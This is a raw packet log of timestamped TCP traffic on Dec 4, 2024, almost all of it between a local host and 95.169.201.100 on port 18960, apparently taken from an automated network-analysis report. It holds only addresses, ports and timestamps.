                                                                                                                                                                                                        Dec 4, 2024 13:53:15.744605064 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.744752884 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.744915009 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.745455980 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.745520115 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.745590925 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.746313095 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.746416092 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.746567965 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.747262955 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.747364998 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.747487068 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.748245955 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.748368979 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.748470068 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.749269962 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.749342918 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.749548912 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.750140905 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.750271082 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.750425100 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.751142025 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.751307964 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.751756907 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.752053976 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.752135038 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.752245903 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.752965927 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.753189087 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.753381968 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.753910065 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.754122019 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.754228115 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.754839897 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.754914045 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.754992008 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.755850077 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.755907059 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.756015062 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.756922960 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.756936073 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.757150888 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.757857084 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.758014917 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.758119106 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.758630991 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.768635035 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.830229044 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.830288887 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.830328941 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.830631018 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.830746889 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.830756903 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.831572056 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.831672907 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.831713915 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.832535982 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.832596064 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.832736015 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.833435059 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.833547115 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.833640099 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.834460020 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.834484100 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.834625959 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.835325003 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.835429907 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.835530043 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.836302996 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.836391926 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.836395979 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.836847067 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.837217093 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.837308884 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.837343931 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.838134050 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.838279009 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.838282108 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.839065075 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.839157104 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.839186907 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.840003967 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.840130091 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.840147018 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.840961933 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.841099977 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.841130018 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.841905117 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.842010021 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.842128038 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.843431950 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.843585014 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.843597889 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.843911886 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.843978882 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.844021082 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.845000982 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.845197916 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.845261097 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.845619917 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.845896006 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.846026897 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.846085072 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.846760035 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.846826077 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.846831083 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.847595930 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.847691059 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.847848892 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.848496914 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.848582983 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.848603010 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.849567890 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.849761009 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.849829912 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.850682974 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.850763083 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.850796938 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.851485968 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.851543903 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.851576090 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.852360964 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.852454901 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.852464914 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.853218079 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.853374004 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.853396893 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.854114056 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.854208946 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.854403019 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.854429007 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.855122089 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.855179071 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.855205059 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.856129885 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.856170893 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.856218100 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.856991053 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.857108116 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.857151985 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.870779037 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.920584917 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.934509993 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.934679031 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.934734106 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.934907913 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.935022116 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.935108900 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.935892105 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.935944080 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.935972929 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.936774015 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.936837912 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.936889887 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.937764883 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.937880993 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.937901974 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.938699961 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.938796043 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.938823938 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.939807892 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.939918995 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.939924002 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.940959930 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.941051960 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.941123009 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.942120075 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.942229033 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.942229033 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.943202019 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.943284035 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.943322897 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.944320917 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.944423914 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.944509029 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.945517063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.945574999 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.945641994 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.946291924 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.946415901 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.946537018 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.947081089 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.947221041 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.947257042 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.948162079 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.948297024 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.948438883 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.949148893 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.949162006 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.949268103 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.950149059 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.950252056 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.950294971 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.951199055 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.951344013 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.951363087 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.951771975 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.951837063 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.951865911 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.952688932 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.952773094 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.952877998 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.953677893 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.953762054 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.953816891 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.954596996 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.954670906 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.954694033 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.955677032 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.955756903 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.955774069 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.956404924 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:15.956630945 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.022428036 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.022556067 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.022706032 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.022861004 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.022900105 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.023041964 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.023200035 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.023802042 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.023932934 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.023967028 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.024759054 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.024826050 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.024955988 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.025660992 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.025748014 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.025909901 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.026724100 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.026833057 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.026865959 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.027564049 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.027703047 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.028018951 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.028786898 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.028873920 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.029010057 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.029671907 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.029782057 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.029906034 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.030555964 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.030659914 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.030663013 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.031641960 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.031718969 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.031872988 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.032439947 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.032588959 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.032619953 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.033267975 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.033376932 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.033440113 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.034135103 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.034274101 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.034554958 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.035167933 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.035245895 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.035285950 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.036221027 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.036322117 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.036350965 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.037122965 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.037273884 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.037301064 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.038203955 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.038292885 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.038436890 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.038907051 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.039057016 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.039304972 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.039803982 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.039850950 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.039877892 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.040754080 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.040817976 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.040921926 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.041691065 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.041758060 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.041879892 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.042769909 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.043103933 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.043124914 CET189604970195.169.201.100192.168.2.7
